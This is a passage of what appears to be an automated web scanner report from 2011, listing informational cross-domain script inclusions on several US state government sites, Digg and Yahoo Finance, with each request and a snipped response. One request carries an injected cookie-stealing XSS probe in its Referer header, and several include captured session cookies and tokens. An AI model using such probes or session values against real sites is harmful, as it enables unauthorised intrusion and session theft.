<!-- BEGIN HumanTag Monitor. DO NOT MOVE! MUST BE PLACED JUST BEFORE THE /BODY TAG --><script language="javascript" type="text/javascript" src="http://server.iad.liveperson.net/hc/33511087/x.js?cmd=file&amp;file=chatScript3&amp;site=33511087"> </script>
...[SNIP]...

20.9. http://data.ok.gov/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://data.ok.gov
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET / HTTP/1.1
Host: data.ok.gov
Proxy-Connection: keep-alive
Referer: http://ok.gov/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 11:21:24 GMT
Server: Apache
ETag: "583e4273c11567c4c6927c577b04a98c"
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: logged_in=; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: _blist_session_id=%7C%7CBAh7BzoPc2Vzc2lvbl9pZCIlODZlN2YyM2I1NjlkOWFlYjI3YzhkM2I5MWNjNWI0MDg6EF9jc3JmX3Rva2VuSSIxTXZocGVFa1Z6eXJVa2d0cE1USHNMTnZncUFhaUsya0VkU1h2bUZQV0xydz0GOgZFRg%3D%3D--4e578a989920617834aa728d905614ab004cb7f5; path=/; HttpOnly
Status: 200
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 251794

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<!--[if lte IE 7]>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lan
...[SNIP]...
</div>

<script type='text/javascript'
src='http://maps.google.com/maps/api/js?sensor=false'>
</script>
...[SNIP]...

20.10. http://data.ok.gov/browse  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://data.ok.gov
Path:   /browse

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /browse HTTP/1.1
Host: data.ok.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: logged_in=; __utmz=120904477.1304162509.1.1.utmcsr=ok.gov|utmccn=(referral)|utmcmd=referral|utmcct=/; socrata-csrf-token=iR%2BNktWzrQ%2FEwlB20ldODmBNsYTJ3DZuQuUjyKwBSMk%3D; __utma=120904477.1835992193.1304162509.1304162509.1304162509.1; __utmc=120904477; __utmb=120904477.3.9.1304162592440; _blist_session_id=%7C%7CBAh7BzoPc2Vzc2lvbl9pZCIlYzk5MTE2M2JlMDU4NTBlMTU5Yzk1ZTY0ODZjM2Y2ZGM6EF9jc3JmX3Rva2VuSSIxaVIrTmt0V3pyUS9Fd2xCMjBsZE9EbUJOc1lUSjNEWnVRdVVqeUt3QlNNaz0GOgZFRg%3D%3D--1098e8b56bd95463731c8eef82a95969875cec27;

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:19:29 GMT
Server: Apache
ETag: "5e1074176fe376a73c628bb959a485bd"
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: logged_in=; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: _blist_session_id=%7C%7CBAh7BzoPc2Vzc2lvbl9pZCIlYzk5MTE2M2JlMDU4NTBlMTU5Yzk1ZTY0ODZjM2Y2ZGM6EF9jc3JmX3Rva2VuSSIxaVIrTmt0V3pyUS9Fd2xCMjBsZE9EbUJOc1lUSjNEWnVRdVVqeUt3QlNNaz0GOgZFRg%3D%3D--1098e8b56bd95463731c8eef82a95969875cec27; path=/; HttpOnly
Content-Length: 247091
Status: 200
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<!--[if lte IE 7]>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lan
...[SNIP]...
</div>

<script type='text/javascript'
src='http://maps.google.com/maps/api/js?sensor=false'>
</script>
...[SNIP]...

20.11. http://de.gov/profile.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://de.gov
Path:   /profile.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /profile.php HTTP/1.1
Host: de.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fcspersistslider1=3;

Response

HTTP/1.1 404 Not Found
Date: Sat, 30 Apr 2011 12:19:26 GMT
Server: Apache/2.2.3 (Red Hat)
Accept-Ranges: bytes
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 25272

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-us">
<head>
<!-- Global meta tags, external stylesheets and scripts -->
<meta
...[SNIP]...
<!-- BEGIN HumanTag Monitor. DO NOT MOVE! MUST BE PLACED JUST BEFORE THE /BODY TAG --><script language="javascript" type="text/javascript" src="http://server.iad.liveperson.net/hc/33511087/x.js?cmd=file&amp;file=chatScript3&amp;site=33511087"> </script>
...[SNIP]...

20.12. http://de.gov/topics/yourgovernment  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://de.gov
Path:   /topics/yourgovernment

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /topics/yourgovernment HTTP/1.1
Host: de.gov
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: fcspersistslider1=3

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 00:37:38 GMT
Server: Apache/2.2.3 (Red Hat)
Content-Location: yourgovernment.shtml
Vary: negotiate
TCN: choice
Accept-Ranges: bytes
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 32374

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-us">
<head>
<!-- Global meta tags, external stylesheets and scripts -->
<meta
...[SNIP]...
<!-- BEGIN HumanTag Monitor. DO NOT MOVE! MUST BE PLACED JUST BEFORE THE /BODY TAG --><script language="javascript" type="text/javascript" src="http://server.iad.liveperson.net/hc/33511087/x.js?cmd=file&amp;file=chatScript3&amp;site=33511087"> </script>
...[SNIP]...

20.13. http://digg.com/submit  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://digg.com
Path:   /submit

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /submit HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:20:08 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Set-Cookie: traffic_control=-781655937076164456%3A203; expires=Sun, 01-May-2011 12:20:09 GMT; path=/; domain=digg.com
Set-Cookie: d=812aa8e869f0d2e7c87704b3fa38f3583a3547de3e2f6866581f174175564be4; expires=Thu, 29-Apr-2021 22:27:49 GMT; path=/; domain=.digg.com
X-Digg-Time: D=24701 10.2.129.157
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 8171

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Digg
- Submit a link
</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics
...[SNIP]...
</div>
<script src="http://cdn2.diggstatic.com/js/two_column/common/fb_loader.4050a241.js" type="text/javascript"></script>
...[SNIP]...
</div>
<script src="http://cdn2.diggstatic.com/js/two_column/lib.45640926.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://cdn2.diggstatic.com/js/two_column/Omniture/omniture.6c48dd51.js" type="text/javascript"></script>
...[SNIP]...

20.14. http://dola.colorado.gov/dem/index.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dola.colorado.gov
Path:   /dem/index.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /dem/index.html HTTP/1.1
Host: dola.colorado.gov
Proxy-Connection: keep-alive
Referer: http://www.colorado.gov/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 11:23:04 GMT
Server: Apache/2.0.59 (Win32) mod_jk/1.2.18 mod_ssl/2.0.59 OpenSSL/0.9.8b JRun/4.0
Last-Modified: Mon, 04 Apr 2011 22:44:51 GMT
ETag: "46-3605-81f39234"
Accept-Ranges: bytes
Content-Length: 13829
Content-Type: text/html
Via: 1.1 dola.colorado.gov (Apache/2.2.11)

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><!-- Insta
...[SNIP]...
<hr />

<script language="JavaScript" src="http://landmark-project.com/feed2js/feed2js.php?src=http%3A%2F%2Fcoemergency.blogspot.com%2Ffeeds%2Fposts%2Fdefault&num=5&date=y&html=p" type="text/javascript"></script>
...[SNIP]...

20.15. http://emergency.louisiana.gov/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://emergency.louisiana.gov
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: emergency.louisiana.gov
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 00:22:52 GMT
Server: Apache
Last-Modified: Tue, 05 Apr 2011 20:25:40 GMT
ETag: "2fbc2-55f1-4a031ae013900"
Accept-Ranges: bytes
Content-Length: 22001
Content-Type: text/html

<link href="scripts/css/master.css" rel="stylesheet" type="text/css">
<title>emergency.louisiana.gov</title>
<table class="table-lagov" style="border-bottom: 1px solid rgb(175, 175, 175);">
<tbo
...[SNIP]...
</script>

<script src="http://lib.gohsep.la.gov/frameworks/js/jQuery/jquery.js" type="text/javascript"></script>
<script src="http://lib.gohsep.la.gov/frameworks/js/jQuery/jquery-ui.js" type="text/javascript"></script>
...[SNIP]...

20.16. http://finance.yahoo.com/q  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://finance.yahoo.com
Path:   /q

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /q HTTP/1.1
Host: finance.yahoo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:20:34 GMT
Set-Cookie: B=3bnjjep6rnvki&b=3&s=if; expires=Tue, 30-Apr-2013 20:00:00 GMT; path=/; domain=.yahoo.com
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Cache-Control: private
Set-Cookie: PRF=; expires=Tue, 27 Apr 2021 05:20:34 GMT; path=/; domain=finance.yahoo.com
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Age: 0
Connection: close
Server: YTS/1.19.5

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US">
<head><meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>Quotes &
...[SNIP]...
</div><script charset="utf-8" type="text/javascript" src="http://l.yimg.com/a/lib/uh/15/js/uh_rsa-1.0.9.js"></script>
...[SNIP]...
9156/K=r0.1.0uyrKvSwPw_2EnLHw/A=3082386578634693138/R=1/X=3/*;ord=1304166034499156?" WIDTH=120 HEIGHT=60 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR='#000000'><SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N6067.160910.7443114402621/B5129127.23;abr=!ie;sz=120x60;dcopt=rcl;mtfIFPath=nofile;click=http://global.ard.yahoo.com/SIG=15skshlnq/M=601546236.602387688.717674051.557377551/D=fin/S=95993639:FB2/Y=YAHOO/EXP=1304173234/L=BfhyTUwNclItYLtjNeD_2gEkrcHW8027_pIAByqq/B=JohpYGKImiQ-/J=1304166034499156/K=r0.1.0uyrKvSwPw_2EnLHw/A=3082386578634693138/R=2/X=3/*;ord=1304166034499156?"></SCRIPT>
...[SNIP]...
</script>

<SCRIPT type="text/javascript" src="http://resource.tcgmsrv.net/tase/js/uac.js"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://l.yimg.com/bm/combo?fi/common/p/d/static/js/2.0.186444/yui_2.8.0/build/yuiloader-dom-event/2.0.0/mini/yuiloader-dom-event.js&amp;fi/common/p/d/static/js/2.0.186444/yui_2.8.0/build/container/2.0.0/mini/container.js&amp;fi/common/p/d/static/js/2.0.186444/2.0.0/mini/ylc_1.9.js&amp;fi/common/p/d/static/js/2.0.186444/2.0.0/mini/yfi_loader.js&amp;fi/common/p/d/static/js/2.0.186444/2.0.0/mini/yfi_symbol_suggest.js&amp;fi/common/p/d/static/js/2.0.186444/2.0.0/mini/yfi_init_symbol_suggest.js&amp;fi/common/p/d/static/js/2.0.186444/2.0.0/mini/yfi_nav_topnav_init.js&amp;fi/common/p/d/static/js/2.0.186444/2.0.0/mini/yfi_nav_topnav.js"></script>
...[SNIP]...
<input type="hidden" id=".yficrumb" name=".yficrumb" value=""><script type="text/javascript" src="http://l.yimg.com/bm/combo?fi/common/p/d/static/js/2.0.186444/2.0.0/mini/yfs_concat.js&amp;fi/common/p/d/static/js/2.0.186444/translations/2.0.0/mini/yfs_l10n_en-US.js"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://l.yimg.com/bm/combo?fi/common/p/d/static/js/2.0.186444/yui_2.8.0/build/cookie/2.0.0/mini/cookie-min.js&amp;fi/common/p/d/static/js/2.0.186444/2.0.0/mini/yfi_ticker_concat.js"></script>
...[SNIP]...

20.17. http://fls.doubleclick.net/activityi  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fls.doubleclick.net
Path:   /activityi

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /activityi;src=2624116;type=non-s657;cat=unive451;ord=2089402840938.4192? HTTP/1.1
Host: fls.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.kodakgallery.com/gallery/lp/2010/visit_florida/vacation_photos.jsp?e81c7*/alert(document.cookie)//4c687dfaa6f=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; _msuuid_4561iuf9g3q501317=389E4AAF-0A51-4C2B-B96D-B96D82DE5465; id=22fba3001601008d|1672981/717726/15092,1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
X-Frame-Options: ALLOWALL
Server: Floodlight
Date: Sat, 30 Apr 2011 15:08:25 GMT
Expires: Sat, 30 Apr 2011 15:08:25 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Content-Type: text/html
X-XSS-Protection: 1; mode=block
Content-Length: 2415

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><title></title></head><body style="background-color: transparent"><img src="https://se
...[SNIP]...
</script>
<script type="text/javascript" src="https://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...

20.18. http://ga.gov/00/channel_createdate/0,2095,4802_49268007,00.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ga.gov
Path:   /00/channel_createdate/0,2095,4802_49268007,00.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /00/channel_createdate/0,2095,4802_49268007,00.html HTTP/1.1
Host: ga.gov
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=E163D8F13AEF17647444D0A429B79A87; vgnvisitor=2w45tg00s3c00001jrJkq8F01b; s_vnum=1306715774545%26vn%3D1; s_cc=true; s_nr=1304123795484; s_invisit=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 00:22:32 GMT
Server: Apache/1.3.29 (Unix)
Content-Type: text/html
Content-Length: 26178


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<link rel="stylesheet" href="/gta/mcm/files/MasterSiteCDA.css" type="text/css" />
<script src="http://www.surveymonkey.com/jsPop.aspx?sm=S76tDGCVR8qVtlppre7tsA_3d_3d"> </script>
...[SNIP]...
<div class="stats">
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

20.19. http://ga.gov/00/channel_title/0,2094,4802_13167990,00.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ga.gov
Path:   /00/channel_title/0,2094,4802_13167990,00.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /00/channel_title/0,2094,4802_13167990,00.html HTTP/1.1
Host: ga.gov
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=E163D8F13AEF17647444D0A429B79A87; vgnvisitor=2w45tg00s3c00001jrJkq8F01b; s_cc=true; s_nr=1304123774544; s_vnum=1306715774545%26vn%3D1; s_invisit=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 00:21:09 GMT
Server: Apache/1.3.29 (Unix)
Content-Type: text/html
Content-Length: 24995


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<link rel="stylesheet" href="/gta/mcm/files/MasterSiteCDA.css" type="text/css" />
<script src="http://www.surveymonkey.com/jsPop.aspx?sm=S76tDGCVR8qVtlppre7tsA_3d_3d"> </script>
...[SNIP]...
<div class="stats">
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

20.20. http://ga.gov/00/channel_title/0,2094,4802_4965,00.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ga.gov
Path:   /00/channel_title/0,2094,4802_4965,00.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /00/channel_title/0,2094,4802_4965,00.html HTTP/1.1
Host: ga.gov
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=E163D8F13AEF17647444D0A429B79A87; vgnvisitor=2w45tg00s3c00001jrJkq8F01b; s_cc=true; s_nr=1304123774544; s_vnum=1306715774545%26vn%3D1; s_invisit=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 00:07:35 GMT
Server: Apache/1.3.29 (Unix)
Content-Type: text/html
Content-Length: 25927


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<link rel="stylesheet" href="/gta/mcm/files/MasterSiteCDA.css" type="text/css" />
<script src="http://www.surveymonkey.com/jsPop.aspx?sm=S76tDGCVR8qVtlppre7tsA_3d_3d"> </script>
...[SNIP]...
<div class="stats">
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

20.21. http://ga.gov/00/channel_title/0,2094,4802_4969,00.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ga.gov
Path:   /00/channel_title/0,2094,4802_4969,00.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /00/channel_title/0,2094,4802_4969,00.html HTTP/1.1
Host: ga.gov
Proxy-Connection: keep-alive
Referer: http://ga.gov/00/home/0,2061,4802,00.html;jsessionid=E163D8F13AEF17647444D0A429B79A87
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=E163D8F13AEF17647444D0A429B79A87; vgnvisitor=2w45tg00s3c00001jrJkq8F01b; s_cc=true; s_vnum=1306715774545%26vn%3D1; s_nr=1304123790113; s_invisit=true; s_sq=georgiagovprod%3D%2526pid%253DGeorgiaGov%252520-%252520Online%252520access%252520to%252520Georgia%252520government.%2526pidt%253D1%2526oid%253Dhttp%25253A//ga.gov/00/channel_title/0%25252C2094%25252C4802_4969%25252C00.html%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 00:21:11 GMT
Server: Apache/1.3.29 (Unix)
Content-Type: text/html
Content-Length: 25750


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<link rel="stylesheet" href="/gta/mcm/files/MasterSiteCDA.css" type="text/css" />
<script src="http://www.surveymonkey.com/jsPop.aspx?sm=S76tDGCVR8qVtlppre7tsA_3d_3d"> </script>
...[SNIP]...
<div class="stats">
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

20.22. http://ga.gov/00/channel_title/0,2094,4802_5035,00.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ga.gov
Path:   /00/channel_title/0,2094,4802_5035,00.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /00/channel_title/0,2094,4802_5035,00.html HTTP/1.1
Host: ga.gov
Proxy-Connection: keep-alive
Referer: http://ga.gov/00/mobile/0,2783,4802,00.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: vgnvisitor=2w45tg00s3c00001jrJkq8F01b; s_vnum=1306715774545%26vn%3D1; JSESSIONID=B90454543E677169DC2E75E0E1107A42; s_cc=true; s_nr=1304125322638; s_invisit=true; s_sq=georgiagovprod%3D%2526pid%253DGeorgiaGov%252520-%252520Mobile%252520Home%252520Page%2526pidt%253D1%2526oid%253Dhttp%25253A//ga.gov/00/channel_title/0%25252C2094%25252C4802_5035%25252C00.html%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 00:46:43 GMT
Server: Apache/1.3.29 (Unix)
Content-Type: text/html
Content-Length: 26055


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<link rel="stylesheet" href="/gta/mcm/files/MasterSiteCDA.css" type="text/css" />
<script src="http://www.surveymonkey.com/jsPop.aspx?sm=S76tDGCVR8qVtlppre7tsA_3d_3d"> </script>
...[SNIP]...
<div class="stats">
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

20.23. http://ga.gov/00/home/0,2061,4802,00.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ga.gov
Path:   /00/home/0,2061,4802,00.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /00/home/0,2061,4802,00.html;jsessionid=E163D8F13AEF17647444D0A429B79A87 HTTP/1.1
Host: ga.gov
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=E163D8F13AEF17647444D0A429B79A87; vgnvisitor=2w45tg00s3c00001jrJkq8F01b

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 00:07:16 GMT
Server: Apache/1.3.29 (Unix)
Content-Type: text/html
Content-Length: 27652


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang=
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="Georgia.Gov - Headlines [RSS]" href="http://www.georgia.gov/rss/headlines.xml" />
<script src="http://www.surveymonkey.com/jsPop.aspx?sm=S76tDGCVR8qVtlppre7tsA_3d_3d"> </script>
...[SNIP]...
<div class="stats">
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

20.24. http://ga.gov/00/mobile/0,2783,4802,00.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ga.gov
Path:   /00/mobile/0,2783,4802,00.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /00/mobile/0,2783,4802,00.html HTTP/1.1
Host: ga.gov
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
